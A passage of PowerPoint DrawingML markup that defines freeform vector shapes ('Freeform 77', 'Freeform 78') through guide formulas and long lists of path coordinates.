                  <a:gd name="T18" fmla="*/ 336 w 574"/>
                  <a:gd name="T19" fmla="*/ 482 h 531"/>
                  <a:gd name="T20" fmla="*/ 294 w 574"/>
                  <a:gd name="T21" fmla="*/ 508 h 531"/>
                  <a:gd name="T22" fmla="*/ 221 w 574"/>
                  <a:gd name="T23" fmla="*/ 530 h 531"/>
                  <a:gd name="T24" fmla="*/ 184 w 574"/>
                  <a:gd name="T25" fmla="*/ 530 h 531"/>
                  <a:gd name="T26" fmla="*/ 116 w 574"/>
                  <a:gd name="T27" fmla="*/ 503 h 531"/>
                  <a:gd name="T28" fmla="*/ 53 w 574"/>
                  <a:gd name="T29" fmla="*/ 440 h 531"/>
                  <a:gd name="T30" fmla="*/ 32 w 574"/>
                  <a:gd name="T31" fmla="*/ 414 h 531"/>
                  <a:gd name="T32" fmla="*/ 6 w 574"/>
                  <a:gd name="T33" fmla="*/ 356 h 531"/>
                  <a:gd name="T34" fmla="*/ 0 w 574"/>
                  <a:gd name="T35" fmla="*/ 330 h 531"/>
                  <a:gd name="T36" fmla="*/ 6 w 574"/>
                  <a:gd name="T37" fmla="*/ 283 h 531"/>
                  <a:gd name="T38" fmla="*/ 16 w 574"/>
                  <a:gd name="T39" fmla="*/ 236 h 531"/>
                  <a:gd name="T40" fmla="*/ 42 w 574"/>
                  <a:gd name="T41" fmla="*/ 194 h 531"/>
                  <a:gd name="T42" fmla="*/ 79 w 574"/>
                  <a:gd name="T43" fmla="*/ 157 h 531"/>
                  <a:gd name="T44" fmla="*/ 163 w 574"/>
                  <a:gd name="T45" fmla="*/ 89 h 531"/>
                  <a:gd name="T46" fmla="*/ 253 w 574"/>
                  <a:gd name="T47" fmla="*/ 31 h 531"/>
                  <a:gd name="T48" fmla="*/ 300 w 574"/>
                  <a:gd name="T49" fmla="*/ 10 h 531"/>
                  <a:gd name="T50" fmla="*/ 347 w 574"/>
                  <a:gd name="T51" fmla="*/ 0 h 531"/>
                  <a:gd name="T52" fmla="*/ 394 w 574"/>
                  <a:gd name="T53" fmla="*/ 4 h 531"/>
                  <a:gd name="T54" fmla="*/ 436 w 574"/>
                  <a:gd name="T55" fmla="*/ 15 h 531"/>
                  <a:gd name="T56" fmla="*/ 457 w 574"/>
                  <a:gd name="T57" fmla="*/ 31 h 531"/>
                  <a:gd name="T58" fmla="*/ 504 w 574"/>
                  <a:gd name="T59" fmla="*/ 67 h 531"/>
                  <a:gd name="T60" fmla="*/ 525 w 574"/>
                  <a:gd name="T61" fmla="*/ 94 h 531"/>
                  <a:gd name="T62" fmla="*/ 567 w 574"/>
                  <a:gd name="T63" fmla="*/ 167 h 531"/>
                  <a:gd name="T64" fmla="*/ 573 w 574"/>
                  <a:gd name="T65" fmla="*/ 188 h 531"/>
                  <a:gd name="T66" fmla="*/ 562 w 574"/>
                  <a:gd name="T67" fmla="*/ 272 h 531"/>
                  <a:gd name="T68" fmla="*/ 541 w 574"/>
                  <a:gd name="T69" fmla="*/ 314 h 531"/>
                  <a:gd name="T70" fmla="*/ 510 w 574"/>
                  <a:gd name="T71" fmla="*/ 351 h 531"/>
                  <a:gd name="T72" fmla="*/ 420 w 574"/>
                  <a:gd name="T73" fmla="*/ 430 h 531"/>
                  <a:gd name="T74" fmla="*/ 226 w 574"/>
                  <a:gd name="T75" fmla="*/ 220 h 531"/>
                  <a:gd name="T76" fmla="*/ 426 w 574"/>
                  <a:gd name="T77" fmla="*/ 251 h 531"/>
                  <a:gd name="T78" fmla="*/ 441 w 574"/>
                  <a:gd name="T79" fmla="*/ 236 h 531"/>
                  <a:gd name="T80" fmla="*/ 452 w 574"/>
                  <a:gd name="T81" fmla="*/ 214 h 531"/>
                  <a:gd name="T82" fmla="*/ 457 w 574"/>
                  <a:gd name="T83" fmla="*/ 183 h 531"/>
                  <a:gd name="T84" fmla="*/ 457 w 574"/>
                  <a:gd name="T85" fmla="*/ 167 h 531"/>
                  <a:gd name="T86" fmla="*/ 447 w 574"/>
                  <a:gd name="T87" fmla="*/ 151 h 531"/>
                  <a:gd name="T88" fmla="*/ 415 w 574"/>
                  <a:gd name="T89" fmla="*/ 125 h 531"/>
                  <a:gd name="T90" fmla="*/ 400 w 574"/>
                  <a:gd name="T91" fmla="*/ 125 h 531"/>
                  <a:gd name="T92" fmla="*/ 383 w 574"/>
                  <a:gd name="T93" fmla="*/ 125 h 531"/>
                  <a:gd name="T94" fmla="*/ 347 w 574"/>
                  <a:gd name="T95" fmla="*/ 136 h 531"/>
                  <a:gd name="T96" fmla="*/ 294 w 574"/>
                  <a:gd name="T97" fmla="*/ 173 h 531"/>
                  <a:gd name="T98" fmla="*/ 383 w 574"/>
                  <a:gd name="T99" fmla="*/ 288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74" h="531">
                    <a:moveTo>
                      <a:pt x="189" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="426" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="251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4" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2947988" y="5394325"/>
                <a:ext cx="225425" cy="171450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 626"/>
                  <a:gd name="T1" fmla="*/ 104 h 478"/>
                  <a:gd name="T2" fmla="*/ 457 w 626"/>
                  <a:gd name="T3" fmla="*/ 152 h 478"/>
                  <a:gd name="T4" fmla="*/ 457 w 626"/>
                  <a:gd name="T5" fmla="*/ 157 h 478"/>
                  <a:gd name="T6" fmla="*/ 457 w 626"/>
                  <a:gd name="T7" fmla="*/ 157 h 478"/>
                  <a:gd name="T8" fmla="*/ 499 w 626"/>
                  <a:gd name="T9" fmla="*/ 152 h 478"/>
                  <a:gd name="T10" fmla="*/ 541 w 626"/>
                  <a:gd name="T11" fmla="*/ 152 h 478"/>
                  <a:gd name="T12" fmla="*/ 541 w 626"/>
                  <a:gd name="T13" fmla="*/ 152 h 478"/>
                  <a:gd name="T14" fmla="*/ 562 w 626"/>
                  <a:gd name="T15" fmla="*/ 157 h 478"/>
                  <a:gd name="T16" fmla="*/ 578 w 626"/>
                  <a:gd name="T17" fmla="*/ 168 h 478"/>
                  <a:gd name="T18" fmla="*/ 594 w 626"/>
                  <a:gd name="T19" fmla="*/ 178 h 478"/>
                  <a:gd name="T20" fmla="*/ 610 w 626"/>
                  <a:gd name="T21" fmla="*/ 194 h 478"/>
                  <a:gd name="T22" fmla="*/ 610 w 626"/>
                  <a:gd name="T23" fmla="*/ 194 h 478"/>
                  <a:gd name="T24" fmla="*/ 620 w 626"/>
                  <a:gd name="T25" fmla="*/ 204 h 478"/>
                  <a:gd name="T26" fmla="*/ 620 w 626"/>
                  <a:gd name="T27" fmla="*/ 204 h 478"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 215 h 478"/>
                  <a:gd name="T30" fmla="*/ 520 w 626"/>
                  <a:gd name="T31" fmla="*/ 304 h 478"/>
                  <a:gd name="T32" fmla="*/ 520 w 626"/>
                  <a:gd name="T33" fmla="*/ 304 h 478"/>
                  <a:gd name="T34" fmla="*/ 510 w 626"/>
                  <a:gd name="T35" fmla="*/ 288 h 478"/>
                  <a:gd name="T36" fmla="*/ 510 w 626"/>
                  <a:gd name="T37" fmla="*/ 288 h 478"/>
                  <a:gd name="T38" fmla="*/ 494 w 626"/>
                  <a:gd name="T39" fmla="*/ 272 h 478"/>
                  <a:gd name="T40" fmla="*/ 494 w 626"/>
                  <a:gd name="T41" fmla="*/ 272 h 478"/>
                  <a:gd name="T42" fmla="*/ 467 w 626"/>
                  <a:gd name="T43" fmla="*/ 246 h 478"/>
                  <a:gd name="T44" fmla="*/ 467 w 626"/>
                  <a:gd name="T45" fmla="*/ 246 h 478"/>
                  <a:gd name="T46" fmla="*/ 447 w 626"/>
                  <a:gd name="T47" fmla="*/ 236 h 478"/>
                  <a:gd name="T48" fmla="*/ 431 w 626"/>
                  <a:gd name="T49" fmla="*/ 231 h 478"/>
                  <a:gd name="T50" fmla="*/ 431 w 626"/>
                  <a:gd name="T51" fmla="*/ 231 h 478"/>
                  <a:gd name="T52" fmla="*/ 410 w 626"/>
                  <a:gd name="T53" fmla="*/ 231 h 478"/>
                  <a:gd name="T54" fmla="*/ 389 w 626"/>
                  <a:gd name="T55" fmla="*/ 231 h 478"/>
                  <a:gd name="T56" fmla="*/ 389 w 626"/>
                  <a:gd name="T57" fmla="*/ 231 h 478"/>
                  <a:gd name="T58" fmla="*/ 368 w 626"/>
                  <a:gd name="T59" fmla="*/ 241 h 478"/>
                  <a:gd name="T60" fmla="*/ 347 w 626"/>
                  <a:gd name="T61" fmla="*/ 257 h 478"/>
                  <a:gd name="T62" fmla="*/ 95 w 626"/>
                  <a:gd name="T63" fmla="*/ 477 h 478"/>
                  <a:gd name="T64" fmla="*/ 0 w 626"/>
                  <a:gd name="T65" fmla="*/ 367 h 478"/>
                  <a:gd name="T66" fmla="*/ 426 w 626"/>
                  <a:gd name="T67" fmla="*/ 0 h 478"/>
                  <a:gd name="T68" fmla="*/ 515 w 626"/>
                  <a:gd name="T69" fmla="*/ 104 h 4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26" h="478">
                    <a:moveTo>
                      <a:pt x="515" y="104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="104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5" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3041650" y="5505450"/>
                <a:ext cx="215900" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 599"/>
                  <a:gd name="T1" fmla="*/ 53 h 631"/>
                  <a:gd name="T2" fmla="*/ 331 w 599"/>
                  <a:gd name="T3" fmla="*/ 5 h 631"/>
                  <a:gd name="T4" fmla="*/ 362 w 599"/>
                  <a:gd name="T5" fmla="*/ 0 h 631"/>
                  <a:gd name="T6" fmla="*/ 399 w 599"/>
                  <a:gd name="T7" fmla="*/ 0 h 631"/>
                  <a:gd name="T8" fmla="*/ 462 w 599"/>
                  <a:gd name="T9" fmla="*/ 26 h 631"/>
                  <a:gd name="T10" fmla="*/ 494 w 599"/>
                  <a:gd name="T11" fmla="*/ 48 h 631"/>
                  <a:gd name="T12" fmla="*/ 520 w 599"/>
                  <a:gd name="T13" fmla="*/ 74 h 631"/>
                  <a:gd name="T14" fmla="*/ 583 w 599"/>
                  <a:gd name="T15" fmla="*/ 158 h 631"/>
                  <a:gd name="T16" fmla="*/ 598 w 599"/>
                  <a:gd name="T17" fmla="*/ 195 h 631"/>
                  <a:gd name="T18" fmla="*/ 598 w 599"/>
                  <a:gd name="T19" fmla="*/ 231 h 631"/>
                  <a:gd name="T20" fmla="*/ 578 w 599"/>
                  <a:gd name="T21" fmla="*/ 289 h 631"/>
                  <a:gd name="T22" fmla="*/ 562 w 599"/>
                  <a:gd name="T23" fmla="*/ 315 h 631"/>
                  <a:gd name="T24" fmla="*/ 321 w 599"/>
                  <a:gd name="T25" fmla="*/ 546 h 631"/>
                  <a:gd name="T26" fmla="*/ 278 w 599"/>
                  <a:gd name="T27" fmla="*/ 588 h 631"/>
                  <a:gd name="T28" fmla="*/ 257 w 599"/>
                  <a:gd name="T29" fmla="*/ 630 h 631"/>
                  <a:gd name="T30" fmla="*/ 163 w 599"/>
                  <a:gd name="T31" fmla="*/ 530 h 631"/>
                  <a:gd name="T32" fmla="*/ 174 w 599"/>
                  <a:gd name="T33" fmla="*/ 504 h 631"/>
                  <a:gd name="T34" fmla="*/ 189 w 599"/>
                  <a:gd name="T35" fmla="*/ 478 h 631"/>
                  <a:gd name="T36" fmla="*/ 147 w 599"/>
                  <a:gd name="T37" fmla="*/ 483 h 631"/>
                  <a:gd name="T38" fmla="*/ 110 w 599"/>
                  <a:gd name="T39" fmla="*/ 473 h 631"/>
                  <a:gd name="T40" fmla="*/ 74 w 599"/>
                  <a:gd name="T41" fmla="*/ 452 h 631"/>
                  <a:gd name="T42" fmla="*/ 42 w 599"/>
                  <a:gd name="T43" fmla="*/ 420 h 631"/>
                  <a:gd name="T44" fmla="*/ 5 w 599"/>
                  <a:gd name="T45" fmla="*/ 368 h 631"/>
                  <a:gd name="T46" fmla="*/ 0 w 599"/>
                  <a:gd name="T47" fmla="*/ 336 h 631"/>
                  <a:gd name="T48" fmla="*/ 5 w 599"/>
                  <a:gd name="T49" fmla="*/ 310 h 631"/>
                  <a:gd name="T50" fmla="*/ 27 w 599"/>
                  <a:gd name="T51" fmla="*/ 257 h 631"/>
                  <a:gd name="T52" fmla="*/ 42 w 599"/>
                  <a:gd name="T53" fmla="*/ 236 h 631"/>
                  <a:gd name="T54" fmla="*/ 63 w 599"/>
                  <a:gd name="T55" fmla="*/ 216 h 631"/>
                  <a:gd name="T56" fmla="*/ 116 w 599"/>
                  <a:gd name="T57" fmla="*/ 173 h 631"/>
                  <a:gd name="T58" fmla="*/ 142 w 599"/>
                  <a:gd name="T59" fmla="*/ 163 h 631"/>
                  <a:gd name="T60" fmla="*/ 168 w 599"/>
                  <a:gd name="T61" fmla="*/ 158 h 631"/>
                  <a:gd name="T62" fmla="*/ 226 w 599"/>
                  <a:gd name="T63" fmla="*/ 168 h 631"/>
                  <a:gd name="T64" fmla="*/ 252 w 599"/>
                  <a:gd name="T65" fmla="*/ 179 h 631"/>
                  <a:gd name="T66" fmla="*/ 357 w 599"/>
                  <a:gd name="T67" fmla="*/ 242 h 631"/>
                  <a:gd name="T68" fmla="*/ 383 w 599"/>
                  <a:gd name="T69" fmla="*/ 252 h 631"/>
                  <a:gd name="T70" fmla="*/ 404 w 599"/>
                  <a:gd name="T71" fmla="*/ 257 h 631"/>
                  <a:gd name="T72" fmla="*/ 446 w 599"/>
                  <a:gd name="T73" fmla="*/ 236 h 631"/>
                  <a:gd name="T74" fmla="*/ 462 w 599"/>
                  <a:gd name="T75" fmla="*/ 216 h 631"/>
                  <a:gd name="T76" fmla="*/ 472 w 599"/>
                  <a:gd name="T77" fmla="*/ 195 h 631"/>
                  <a:gd name="T78" fmla="*/ 467 w 599"/>
                  <a:gd name="T79" fmla="*/ 168 h 631"/>
                  <a:gd name="T80" fmla="*/ 446 w 599"/>
                  <a:gd name="T81" fmla="*/ 142 h 631"/>
                  <a:gd name="T82" fmla="*/ 415 w 599"/>
                  <a:gd name="T83" fmla="*/ 121 h 631"/>
                  <a:gd name="T84" fmla="*/ 399 w 599"/>
                  <a:gd name="T85" fmla="*/ 121 h 631"/>
                  <a:gd name="T86" fmla="*/ 352 w 599"/>
                  <a:gd name="T87" fmla="*/ 142 h 631"/>
                  <a:gd name="T88" fmla="*/ 252 w 599"/>
                  <a:gd name="T89" fmla="*/ 63 h 631"/>
                  <a:gd name="T90" fmla="*/ 315 w 599"/>
                  <a:gd name="T91" fmla="*/ 315 h 631"/>
                  <a:gd name="T92" fmla="*/ 289 w 599"/>
                  <a:gd name="T93" fmla="*/ 299 h 631"/>
                  <a:gd name="T94" fmla="*/ 252 w 599"/>
                  <a:gd name="T95" fmla="*/ 284 h 631"/>
                  <a:gd name="T96" fmla="*/ 226 w 599"/>
                  <a:gd name="T97" fmla="*/ 279 h 631"/>
                  <a:gd name="T98" fmla="*/ 168 w 599"/>
                  <a:gd name="T99" fmla="*/ 305 h 631"/>
                  <a:gd name="T100" fmla="*/ 147 w 599"/>
                  <a:gd name="T101" fmla="*/ 326 h 631"/>
                  <a:gd name="T102" fmla="*/ 137 w 599"/>
                  <a:gd name="T103" fmla="*/ 352 h 631"/>
                  <a:gd name="T104" fmla="*/ 137 w 599"/>
                  <a:gd name="T105" fmla="*/ 373 h 631"/>
                  <a:gd name="T106" fmla="*/ 147 w 599"/>
                  <a:gd name="T107" fmla="*/ 399 h 631"/>
                  <a:gd name="T108" fmla="*/ 174 w 599"/>
                  <a:gd name="T109" fmla="*/ 415 h 631"/>
                  <a:gd name="T110" fmla="*/ 189 w 599"/>
                  <a:gd name="T111" fmla="*/ 420 h 631"/>
                  <a:gd name="T112" fmla="*/ 204 w 599"/>
                  <a:gd name="T113" fmla="*/ 426 h 631"/>
                  <a:gd name="T114" fmla="*/ 236 w 599"/>
                  <a:gd name="T115" fmla="*/ 426 h 631"/>
                  <a:gd name="T116" fmla="*/ 257 w 599"/>
                  <a:gd name="T117" fmla="*/ 415 h 631"/>
                  <a:gd name="T118" fmla="*/ 352 w 599"/>
                  <a:gd name="T119" fmla="*/ 326 h 631"/>
                  <a:gd name="T120" fmla="*/ 315 w 599"/>
                  <a:gd name="T121" fmla="*/ 315 h 6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599" h="631">
                    <a:moveTo>
                      <a:pt x="263" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
